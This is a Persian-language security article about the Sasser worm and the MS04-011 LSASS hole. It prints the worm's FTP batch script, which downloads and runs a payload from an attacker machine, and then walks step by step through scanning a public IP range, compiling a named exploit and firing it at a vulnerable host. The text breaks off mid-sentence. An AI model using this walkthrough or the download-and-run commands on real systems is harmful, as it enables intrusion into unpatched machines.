‫ﺑﺮﺩﻥ ﺍﻳﻦ ﻧﻮﻉ ﺍﺯ ﮐﺮﻣﻬﺎﻱ ﺟﺪﻳﺪ ﻧﻴﺴﺘﻨﺪ ﺁﻟﺒﺘﻪ ﺍﮔﺮ ﻫﻨﻮﺯ ﺑﻪ ﺍﻳﻦ ﮐﺮﻡ ﻫﺎ ﺁﻟﻮﺩﻩ ﻧﺸﺪﻩ ﺍﻳﺪ ﭘﺲ ﻭﻗﺖ‬
‫‪ lsasdrv.dll‬ﻭ ﭘﺮﻭﺳﻪ‬ ‫ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻧﺪﻫﻴﺪ ﻭﺑﺎ ‪ Disable‬ﮐﺮﺩﻥ ﺍﻳﻦ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺑﺮﻭﻱ‬
‫‪ lsass.exe‬ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺧﻄﺮ ﺍﻳﻦ ﮐﺮﻡ ﻫﺎ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ ‪.‬‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﮐﻪ ﺧﻮﺍﻧﺪﻳﺪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﺴﻞ ﺑﻌﺪﻱ )‪ Next Ggeneration (NG‬ﮐﺮﻡ ‪ Sasser‬ﻣﻲ‬

‫ﺑﺎﺷﺪ ﮐﻪ ﺑﺴﻴﺎﺭ ﭘﻴﺸﺮﻓﺘﻪ ﺗﺮ ﺍﺯ ‪ Worm.Win32.Sasser. A,b‬ﺑﻮﺩﻩ ﺍﺳﺖ ﮐﺮﻡ ﻫﺎﻱ ﻧﻮﻉ ﺍﻭﻟﻴﻪ‬
‫ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﻳﻦ ﺷﺎﺧﻪ ﺍﺯ ﺭﺟﻴﺴﺘﺮﻱ ﺛﺒﺖ ﻣﻲ ﮐﺮﺩﻧﺪ‬
‫‪[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVer‬‬
‫"‪sion\Run] "avserve2.exe" = "%WINDIR%\avserve2.exe‬‬
‫ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﮑﻞ ﮐﻠﻲ ﺩﺳﺘﻮﺭﺍﺕ ﺯﻳﺮ ‪ IP‬ﻫﺎﻱ ﻫﺪﻑ ﻫﺎﻱ ﺩﻳﮕﺮﻱ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻩ ﻭ ﺷﺮﻭﻉ‬
‫ﺑﻪ ﮔﺴﺘﺮﺵ ﺧﻮﺩ ﺩﺭ ﺷﺒﮑﻪ ﻣﻲ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﮐﺮﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ FTP SERVER‬ﺑﺮ ﺭﻭﻱ ﭘﻮﺭﺕ ‪۵۵۴‬‬
‫‪ TCP/‬ﺑﻪ ﭼﮏ ﮐﺮﺩﻥ ‪ IP‬ﻫﺎﻳﻲ ﮐﻪ ﺍﺯ ﻃﺮﻳﻖ ‪ Windows API‬ﺟﻤﻊ ﺁﻭﺭﻱ ﮐﺮﺩﻩ ﺍﺳﺖ ﺑﺮﺍﻱ ﭘﻲ‬
‫ﺑﺮﺩﻥ ﺑﻪ ‪ OnLine‬ﺑﻮﺩﻥ ﺁﻧﻬﺎ ﻣﻲ ﭘﺮﺩﺍﺯﺩ ﻭ ﺩﺭ ﺻﻮﺭﺕ ﻧﻔﻮﺫ ﭘﺬﻳﺮ ﺑﻮﺩﻥ ﻫﺮ ﻳﮏ ﺍﺯ ‪ IP‬ﻫﺎ ‪ ،‬ﺍﺯ‬
‫ﻃﺮﻳﻖ ﭘﻮﺭﺕ ﻫﺎﻱ ‪ TCP/5554‬ﻭ ‪ TCP/9994‬ﺑﻪ ﺁ ﻥ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﻭﺻﻞ ﻣﻲ ﺷﻮﺩ‬
‫ﻭ ﺧﻮﺩ ﺭﺍ ﮔﺴﺘﺮﺵ ﻣﻲ ﺩﻫﺪ ‪.‬‬
‫‪echo off‬‬
‫‪echo open [attacking machine address] 5554>>cmd.ftp‬‬
‫‪echo anonymous>>cmd.ftp‬‬
‫‪echo user‬‬
‫‪echo bin>>cmd.ftp‬‬
‫‪echo get [random number]_up.exe>>cmd.ftp‬‬
‫‪echo bye>>cmd.ftp‬‬
‫‪echo on‬‬
‫‪ftp -s:cmd.ftp‬‬
‫‪[random number]_up.exe‬‬
‫‪echo off‬‬
‫‪del cmd.ftp‬‬
‫‪echo on‬‬
‫ﺍﻟﺒﺘﻪ ﻻﺯﻡ ﺑﻪ ﺗﻮﺿﻴﺢ ﺍﺳﺖ ﮐﻪ ﻧﻮﻉ ﻫﺎﻱ ﺍﻭﻟﻴﻪ ‪ sasser‬ﻗﺎﺩﺭ ﺑﻪ ﺣﻤﻠﻪ ﺑﻪ ﺍﻳﻦ ﺳﺮﻱ ﺍﺯ ‪ IP‬ﻫﺎ‬
‫ﻧﺒﻮﺩﻧﺪ‬
‫‪127.0.0.1‬‬ ‫•‬
‫‪10.x.x.x‬‬ ‫•‬
‫)‪172.16.x.x - 172.31.x.x (inclusive‬‬ ‫•‬
‫‪192.168.x.x‬‬ ‫•‬
‫‪169.254.x.x‬‬ ‫•‬
‫ﻫﻨﻮﺯ ﻣﻌﻠﻮﻡ ﻧﻴﺴﺖ ﻋﻠﺖ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑﻪ ﭼﻪ ﺩﻟﻴﻞ ﺑﻮﺩ ﺑﻪ ﻋﻠﺖ ﻣﺸﮑﻼﺕ ﻓﻨﻲ ﻳﺎ ﺗﺼﻤﻴﻢ‬
‫ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﮐﺮﻡ ﻣﺰﺑﻮﺭ ﺑﺮﺍﻱ ﺭﺩ ﮐﺮﺩﻥ ‪ IP‬ﻫﺎﻱ ﻓﻮﻕ! ﻭﻟﻲ ﺑﻪ ﻫﺮ ﺟﻬﺖ ﺩﺭ ﻧﺴﺨﻪ ﻫﺎﻱ ‪Sasser‬‬
‫‪ NG‬ﮐﻪ ﺷﺮﺣﻲ ﺍﺯ ﺁﻥ ﺭﺍ ﺩﺭ ﺑﺎﻻ ﻣﺸﺎﻫﺪﻩ ﮐﺮﺩﻳﺪ ﺑﻪ ﺗﻤﺎﻣﻲ ‪ IP‬ﻫﺎﻱ ﻧﻔﻮﺫﭘﺬﻳﺮ ﺣﻤﻠﻪ ﻣﻲ ﮐﻨﻨﺪ‪.‬‬
‫ﻗﺎﺑﻞ ﺫﮐﺮ ﺍﺳﺖ ‪ sasser‬ﺍﺯ ﻧﺴﺨﻪ ﻫﺎﻱ ‪ A‬ﺗﺎ ‪ Z‬ﺑﻪ ﻧﮕﺎﺭﺵ ﺩﺭﺁﻣﺪ ﮐﻪ ﺑﺎ ﺩﺳﺘﮕﻴﺮﻱ ﻓﺮﺩ ﻧﻮﻳﺴﻨﺪﻩ‬
‫ﺍﻳﻦ ﮐﺮﻡ ﺍﺷﺨﺎﺻﻲ ﺩﻳﮕﺮ ﺷﺮﻭﻉ ﺑﻪ ﻣﻨﺘﺸﺮ ﮐﺮﺩﻥ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮﻱ ﺍﺯ ﺍﻳﻦ ﮐﺮﻡ ﻧﻤﻮﺩﻧﺪ ﺑﺎ ﺍﻳﻨﮑﻪ ﮐﺮﻡ‬
‫ﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺯ ﻫﻤﻴﻦ ﺣﻔﺮﻩ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻧﻤﻮﺩﻧﺪ ﻭ ﺩﺍﺭﺍﻱ ‪ Gnome‬ﮐﺪﻱ ﻣﺸﺎﺑﻪ ﺑﻪ‬
‫ﺧﺼﻮﺹ ﺑﺎ ‪ Worm.Win32.Sasser.B‬ﺑﻮﺩﻧﺪ ﻭﻟﻲ ﺍﺯ ﻧﻈﺮ ﺩﺍﻣﻨﻪ ﻧﻔﻮﺫ ﻭ ﺩﻳﮕﺮ ﻗﺎﺑﻠﻴﺖ ﻫﺎ‬
‫ﻭﻧﺤﻮﻩ ﭘﻨﻬﺎﻥ ﮐﺎﺭﻱ ﺗﻔﺎﻭﺕ ﻫﺎﻱ ﭼﺸﻤﮕﻴﺮﻱ ﺑﺎ ﭘﺪﺭﺍﻥ ﺧﻮﺩ ﺩﺍﺷﺘﻨﺪ ‪.‬‬
‫ﻣﻘﺎﻟﻪ ﭘﺎﻳﻴﻦ ﺷﺮﺣﻲ ﺍﺳﺖ ﺑﺮ ﭼﮕﻮﻧﮕﻲ ﻧﻔﻮﺫ ﻣﺮﺣﻠﻪ ﺑﻪ ﻣﺮﺣﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﭘﭻ ﻧﺸﺪﻩ ﺫﮐﺮ‬
‫ﺷﺪﻩ ﺑﺎﻻ ﮐﻪ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻣﻲ ﺭﻭﺩ ﻛﻪ ﺑﻪ ﻋﻠﺖ ﺟﺪﻳﺪ ﺑﻮﺩﻥ ﺍﻳﻦ ﺣﻔﺮﻩ ﻭ ﻧﻴﺰ ﺳﺴﺘﻲ ﻫﻤﻴﺸﮕﻲ ﻣﺪﻳﺮﺍﻥ‬
‫ﺷﺒﮑﻪ ﺑﺮﺍﻱ ﺑﻪ ﺭﻭﺯ ﺭﺳﺎﻧﻲ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺧﻮﺩ‬
‫ﻣﻴﺰﺍﻥ ﺣﻤﻼﺕ ﺑﺎ ﺍﻳﻦ ﺣﻔﺮﻩ ﺑﺴﻴﺎﺭ ﺑﺎﻻ ﺑﺎﺷﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﺳﺒﺐ ﺑﺮ ﺁﻥ ﺷﺪﻳﻢ ﮐﻪ ﻫﻢ ﺑﺎ ﻣﻌﺮﻓﻲ ﺍﻳﻦ ﺣﻔﺮﻩ‬
‫ﻭ ﻧﻴﺰ ﭼﮕﻮﻧﮕﻲ ﻋﻤﻠﮑﺮﺩ ﺁﻥ ﻭﺷﻨﺎﺳﺎﻳﻲ ﺁﻥ ﺑﺮ ﺭﻭﻱ ﺳﺮﻭﺭﻫﺎﻱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺧﻄﺮ ﺍﻳﻦ ﻧﻮﻉ ﺍﺯ‬
‫ﺣﻤﻼﺕ ﺭﺍ ﮔﻮﺷﺰﺩ ﮐﻨﻴﻢ ‪ .‬ﻟﺬﺍ ﻣﻄﺎﻟﺐ ﮔﻔﺘﻪ ﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﺻﺮﻓﺎ ﺟﻨﺒﻪ ﺁﻣﻮﺯﺷﻲ ﺩﺍﺭﺩ ﻭ ﻫﺮ ﮔﻮﻧﻪ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟﺐ ﺫﻳﻞ ﺑﺮ ﻋﻬﺪﻩ ﺧﻮﺩ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻲ ﺑﺎﺷﺪ ﻭﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﻭ ﻫﻤﭽﻨﻴﻨﻦ‬
‫ﻣﺪﻳﺮﻳﺖ ﺳﺎﻳﺖ ﺍﻣﻨﻴﺖ ﻭﺏ ﻫﻴﭻ ﮔﻮﻧﻪ ﻣﺴﻮﻟﻴﺘﻲ ﺭﺍ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻧﻤﻲ ﭘﺬﻳﺮﻧﺪ ‪.‬‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ‪:‬‬
‫) ‪1 : Nmap (Current Version is 3.50 as of this writing‬‬

‫‪http://www.insecure.org‬‬
‫‪2: nc11nt‬‬
‫‪http://www.atstake.com‬‬
‫)‪3: GFI Lan Guard Security Scanner or DSScan (version 2004‬‬

‫‪http://www.foundstone.com‬‬
‫)‪4: HOD-ms04011-lsasrv-expl.c( Compile This Source‬‬
‫‪5:Terminal Server&Client or WinVNC3‬‬

‫‪http://www.download.com‬‬
‫ﺗﺬﮐﺮ‪ :‬ﺗﻤﺎﻣﻲ ﻋﻤﻠﻴﺎﺕ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑﺮ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﻓﺮﺿﻲ ﺑﻮﺩﻩ ﻭ ﺑﻪ ﻣﻨﻈﻮﺭ ﻧﻤﺎﻳﺶ‬
‫ﻋﻤﻠﻴﺎﺕ ﺗﻬﻴﻪ ﮔﺮﺩﻳﺪﻩ ﺍﺳﺖ ﻭ ‪ IP‬ﻫﺎ ﺑﺮﺍﻱ ﻳﮏ ﺷﺒﮑﻪ ‪ LAN‬ﺧﺼﻮﺻﻲ ﻣﻲ ﺑﺎﺷﺪ‬
‫ﺩﺭ ﺍﺑﺘﺪﺍ ﺑﺎﻳﺪ ‪ IP‬ﺧﻮﺩﺗﺎﻥ ﺭﺍ ﺑﺎ ﺩﺳﺘﻮﺭ ‪ Ipconfig‬ﺩﺭ ﺷﺒﮑﻪ ﻣﺸﺨﺺ ﮐﻨﻴﺪ ﻭ ﺳﭙﺲ ﺑﺮﺍﻱ ﭘﻴﺪﺍ‬
‫ﮐﺮﺩﻥ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺭﻭﺷﻦ ﺍﺯ ‪ nmap‬ﺑﺎ ﺳﻮﻳﭻ ‪ –sP‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﮐﻨﻴﻢ )ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ‬
‫ﻃﻮﻻﻧﻲ ﺷﺪﻥ ﻣﻘﺎﻟﻪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻗﺴﻤﺖ ﺍﺯ ﻣﻘﺎﻟﻪ ﺣﻔﺮﻩ ‪ RPC‬ﻭ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ‪، IIS‬‬
‫ﺩﺭ ﺳﺎﻳﺖ ﺍﻣﻨﻴﺖ ﻭﺏ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻴﺪ ﭘﺲ ﺍﺯ ﭘﻴﺪﺍ ﮐﺮﺩﻥ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ‬
‫ﺩﺍﺷﺘﻦ ‪ Bug‬ﻣﻮﺭﺩ ﻧﻈﺮ ﭼﮏ ﮐﻨﻴﺪ‬
‫ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﻓﻘﻂ ﻳﮏ ﻫﺪﻑ ﻣﻮﺭﺩ ﻧﻈﺮ ﺷﻤﺎ ﻣﻲ ﺑﺎﺷﺪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻋﺒﻮﺭ ﮐﻨﻴﺪ ﺁﻧﮕﺎ ﻩ ﺑﺎ‬
‫ﺗﺴﺖ ﻣﺴﺘﻘﻴﻢ ‪ Exploit‬ﺑﺮ ﺭﻭﻱ ﺁﻥ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻭﺟﻮﺩ ﺣﻔﺮﻩ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺁﮔﺎﻩ ﺷﻮﻳﺪ ﻭﻟﻲ ﺍﮔﺮ‬
‫ﺷﻤﺎ ﻗﺼﺪ ﭼﮏ ﮐﺮﺩﻥ ﻳﮏ ‪ Range Ip‬ﺭﺍ ﺑﺮﺍﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺩﺍﺭﻳﺪ ﺗﺴﺖ‬
‫ﺗﮏ ﺗﮏ ﺁﻧﻬﺎ ﺑﺎ ‪ Exploit‬ﮐﺎﺭ ﺧﺴﺘﻪ ﮐﻨﻨﺪﻩ ﺍﻱ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﺎﺷﺪ‪ .‬ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺯ‬
‫‪ GFI Languard Security Scanner v5‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻳﻦ ﺍﺑﺰﺍﺭ ﺍﺳﮑﻨﺮ ﺑﺴﻴﺎﺭ ﭘﺮﻗﺪﺭﺗﻲ‬
‫ﻫﺴﺖ ﮐﻪ ﻧﻪ ﺗﻨﻬﺎ ﺍﻳﻦ ﺣﻔﺮﻩ ﺧﺎﺹ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺩﺭ ﮐﻤﺘﺮﻳﻦ ﺯﻣﺎﻥ ﭼﮏ ﻣﻲ ﮐﻨﺪ ﺑﻠﮑﻪ ﺗﻤﺎﻣﻲ ﺣﻔﺮﻩ‬
‫ﻫﺎﻱ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﺗﺎ ﺍﻳﻦ ﺗﺎﺭﻳﺦ ﺭﺍ ﻫﻢ ﺑﺮﺍﻱ ﺷﻤﺎ ﭘﻴﺪﺍ ﻣﻲ ﻛﻨﺪ ﻭ ﺣﺘﻤﺎ ﺷﻤﺎ ﺣﻔﺮﻩ ﻫﺎﻱ ﺑﺴﻴﺎﺭ‬
‫ﺩﻳﮕﺮﻱ ﺭﺍ ﻫﻢ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﮐﻨﻴﺪ ﻭﻟﻲ ﮐﺎﺭ ﺑﺎ ﺍﻳﻦ ﺍﺳﮑﻨﺮ ﻣﻘﺪﺍﺭﻱ ﻧﻴﺎﺯ ﺑﻪ ﺁﺷﻨﺎﻳﻲ ﻗﺒﻠﻲ ﺑﻪ ﭼﮕﻮﻧﮕﻲ‬
‫‪ Configure‬ﮐﺮﺩﻥ ﺍﺳﮑﻨﺮ ﺩﺍﺭﺩ ﮐﻪ ﺍﮔﺮ ﺑﻪ ﺧﻮﺑﻲ ‪ Configure‬ﻧﺸﻮﺩ ﺷﻤﺎ ﺭﺍ ﻣﻲ ﺗﻮﺍﻧﺪ ﺩﺭ ﻧﺘﺎﻳﺞ‬

‫ﺑﻪ ﺩﺳﺖ ﺁﻣﺪﻩ ﺳﺮﺩﺭ ﮔﻢ ﮐﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻓﻴﻠﺘﺮ ﮐﺮﺩﻥ ﮔﺰﺍﺭﺵ ﺍﺳﮑﻦ ﻧﻬﺎﻳﻲ ﮐﺎﺭﻩ ﭼﻨﺪﺍﻥ ﺍﺳﺎﻧﻲ‬
‫ﻧﻴﺴﺖ ﺍﻳﻦ ﻳﮑﻲ ﺍﺯ ﺍﺳﮑﻨﺮ ﻫﺎﻱ ﻣﺤﺒﻮﺏ ﻫﮑﺮﻫﺎﻱ ﺣﺮﻓﻪ ﺍﻱ ﺍﺳﺖ ‪.‬ﺧﻮﺩ ﻣﻦ ﺁﻥ ﺭﺍ ﺑﻴﺸﺘﺮ ﺍﺯ ﺩﻳﮕﺮ‬
‫ﺍﺳﻜﻨﺮﻫﺎ ﺁﻥ ﺭﺍ ﺗﺮﺟﻴﺢ ﻣﻴﺪﻫﻢ ‪(:.‬‬
‫)ﺍﺳﮑﻨﺮ ‪( GFI Languard Security Scanner v5‬‬
‫ﭘﺲ ﻣﻦ ﺑﺮﺍﻱ ﺷﻤﺎ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺭﺍ ﮐﻪ ﺷﺮﮐﺖ ‪ Foundstone‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺧﺎﺹ ﺗﻬﻴﻪ ﮐﺮﺩﻩ‬
‫ﺍﺳﺖ ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲ ﮐﻨﻢ ﮐﺎﺭ ﺑﺎ ﺍﻳﻦ ﺍﺳﮑﻨﺮ ﺑﺴﻴﺎﺭ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﺗﺮ ﺍﺯ ‪ GFI‬ﻣﻲ ﺑﺎﺷﺪ ﻭﻟﻲ ﻣﻦ‬
‫ﺑﺮﺍﻱ ﺣﺮﻓﻪ ﺍﻱ ﻫﺎ ﻫﻤﺎﻥ ‪ GFI‬ﺭﺍ ﺗﻮﺻﻴﻪ ﻣﻲ ﮐﻨﻢ ) ﺣﺘﻤﺎ ﺑﻪ ﺍﻳﻦ ﺗﻮﺻﻴﻪ ﻣﻦ ﺗﻮﺟﻪ ﮐﻨﻴﺪ(‬
‫‪ DSScan‬ﻧﺮﻣﺎﻓﺰﺍﺭﻱ ﺍﺳﺖ ﮐﻪ ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﺣﻔﺮﻩ ﺷﺮﻭﻉ ﺑﻪ ﻓﺮﺳﺘﺎﺩﻥ ‪ echo packets‬ﺑﻪ‬

‫ﭘﻮﺭﺕ ‪ ۴۴۵‬ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﻣﻲ ﻧﻤﺎﻳﺪ ﮐﻪ ﺩﺭ ﺻﻮﺭﺕ ﻭﺟﻮﺩ ﺣﻔﺮﻩ ﻭ ﺑﺎ ﺑﺮﮔﺸﺘﻦ ‪packet‬‬
‫ﻫﺎ ﺑﻪ ‪ vulnerable‬ﺑﻮﺩﻥ ﺳﻴﺴﺘﻢ ﭘﻲ ﻣﻲ ﺑﺮﺩ ‪.‬‬
‫ﺑﻪ ﺷﮑﻞ ﺯﻳﺮ ﺗﻮﺟﻪ ﮐﻨﻴﺪ )ﻧﺮ ﺍﻓﺰﺍﺭ ‪ DDSScan‬ﺍﺯ ﺷﺮﮐﺖ ‪( Foundstone‬‬
‫ﺑﺮﺍﻱ ﺷﺮﻭﻉ ﮐﺎﺭ ﺑﺎ ﺍﻳﻦ ﺍﺳﮑﻨﺮ ﺍﺑﺘﺪﺍ ﺩﺭ ﻗﺴﻤﺖ ‪ Start ip‬ﻭ ‪ End Ip‬ﺣﻮﺯﻩ ﺍﺳﮑﻦ ﺭﺍ ﻣﺸﺨﺺ‬
‫ﮐﻨﻴﺪ ﺳﭙﺲ ﺑﺎ ﺯﺩﻥ ﻓﻠﺶ ﻣﻘﺎﺑﻞ ﺁﻥ ﺣﻮﺯﻩ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﮐﻨﻴﺪ ﻭ ﺍﺳﮑﻦ ﺭﺍ ﺷﺮﻭﻉ ﮐﻨﻴﺪ‪.‬‬
‫ﻧﺘﺎﻳﺞ ﺑﻪ ﺳﺮﻋﺖ ﻣﺸﺨﺺ ﻣﻲ ﺷﻮﻧﺪ ‪ .‬ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺩﺭ ﻗﺴﻤﺖ ‪ Status‬ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺁﺳﻴﺐ‬
‫ﭘﺬﻳﺮ ﻭ ﻏﻴﺮ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﮐﻨﻴﺪ ﺍﻟﺒﺘﻪ ﺑﺎ ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﻳﮏ ﺗﮏ ‪ Ip‬ﻳﺎ ‪ Host name‬ﺩﺭ‬
‫ﻗﺴﻤﺖ ﺑﺎﻻﻱ ﺍﻳﻦ ﺑﺨﺶ ﻫﻤﭽﻨﻴﻦ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻓﻘﻂ ﻳﮏ ﻫﺪﻑ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﺩﺍﺷﺘﻦ ﺍﻳﻦ ‪ Bug‬ﺗﺴﺖ‬
‫ﮐﻨﻴﺪ ‪.‬‬
‫ﺗﺬﮐﺮ ‪ IP :‬ﻫﺎﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺷﺪﻩ ﺩﺭﺗﺼﺎﻭﻳﺮ ﺯﻳﺮﻣﺮﺑﻮﻁ ﺑﻪ ﻳﮏ ﺷﺒﮑﻪ ﺩﺍﺧﻠﻲ ﻣﻲ ﺑﺎﺷﺪ ﻭﺻﺮﻓﺎ‬
‫ﺟﻬﺖ ﺁﻣﻮﺯﺵ ﺩﺭ ﺩﺍﺧﻞ ﻳﮏ ﺷﺒﮑﻪ ‪ Virtual‬ﺗﺴﺖ ﺷﺪﻩ ﺍﻧﺪ ﻭ ﺩﺭ ﺧﺎﺭﺝ ﺍﺯ ﺷﺒﮑﻪ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﻼ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﺑﺎﺷﺪ ‪.‬‬
‫‪ :۱‬ﺩﺭ ﺷﮑﻞ ﺯﻳﺮ ﻣﻦ ﻳﮏ ﺣﻮﺯﻩ ﺍﺯ ‪ IP‬ﻫﺎ ﺭﺍ ﺍﺯ ‪ 217.218.13.1-217.218.13.254‬ﺍﺳﮑﻦ ﻣﻲ‬

‫ﮐﻨﻢ ﻧﺘﺎﻳﺞ ﺑﻪ ﺳﺮﻋﺖ ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﻣﻲ ﺷﻮﺩ‪ .‬ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻣﺸﺎﻫﺪﻩ ﮐﻨﻴﺪ ﮐﻪ ‪۲۱۷,۲۱۸,۱۳,۱۷۳‬‬
‫ﻳﮏ ﺳﻴﺴﺘﻢ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺑﻪ ﺍﻳﻦ ﺣﻔﺮﻩ ﺍﺳﺖ ﻭ ﻣﻦ ﻗﺼﺪ ﺩﺍﺭﻡ ﺭﻭﻱ ﻫﻤﻴﻦ ﻫﺪﻑ ﮐﺎﺭ ﮐﻨﻢ ) ﺑﻪ ﺷﮑﻞ‬
‫ﺯﻳﺮ ﺗﻮﺟﻪ ﮐﻨﻴﺪ( ﺩﺭ ﻗﺴﻤﺖ ‪ Status‬ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺑﺎ ‪ Vulnerable‬ﻣﺸﺨﺺ ﺷﺪﻩ‬
‫ﺍﻧﺪ ‪.‬‬
‫) ﻋﻤﻠﻴﺎﺕ ﺍﺳﮑﻦ ﺗﻮﺳﻂ ‪( DSScan‬‬
‫‪ :۲‬ﺩﺭ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ‪ Exploit‬ﺭﺍ ﺑﻪ ﺳﺮﻭﺭ ﻫﺪﻑ ﺗﺰﺭﻳﻖ ﻣﻲ ﮐﻨﻴﻢ ) ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ‪ source‬ﺍﻳﻦ‬
‫‪ Exploit‬ﺭﺍ ﺑﺎ ﺑﺮﻧﺎﻣﻪ ‪ Lcc Win 32‬ﮐﺎﻣﭙﺎﻳﻞ ﮐﻨﻴﺪ‪(.‬‬
‫‪HOD-ms04011-lsasrv-‬‬ ‫ﺗﻮﺟﻪ ‪ :‬ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺖ ﺩﺭﺩ ﺑﻪ ﺧﺎﻃﺮ ﺍﻳﻦ ﺍﺳﻢ ﻃﻮﻻﻧﻲ‬
‫‪ expl.exe‬ﻣﻦ ﻧﺎﻡ ﺍﻳﻦ ‪ Exploit‬ﺭﺍ ﺑﻪ ‪ lss.exe‬ﺗﻐﻴﻴﺮ ﻧﺎﻡ ﺩﺍﺩﻡ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲ ﮐﻨﻢ ﺷﻤﺎ ﻫﻢ ﻗﺒﻞ‬
‫ﺍﺯ ﺍﺟﺮﺍﻱ ﺍﮐﺴﭙﻠﻮﻳﺖ ﺍﻳﻦ ﮐﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺑﺪﻫﻴﺪ ‪.‬‬
‫) ﺍﺟﺮﺍﻱ ‪ Exploit‬ﺑﺮ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻫﺪﻑ (‬
‫ﻭ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﮑﻪ ‪ Exploit‬ﺑﺎ ﻣﻮﻓﻘﻴﺖ ﺑﻪ ﻫﺪﻑ ﻭﺻﻞ ﺷﺪ ﻭ ﭘﻴﻐﺎﻡ ‪ Attacking … OK‬ﺭﺍ ﻣﺸﺎﻫﺪﻩ‬
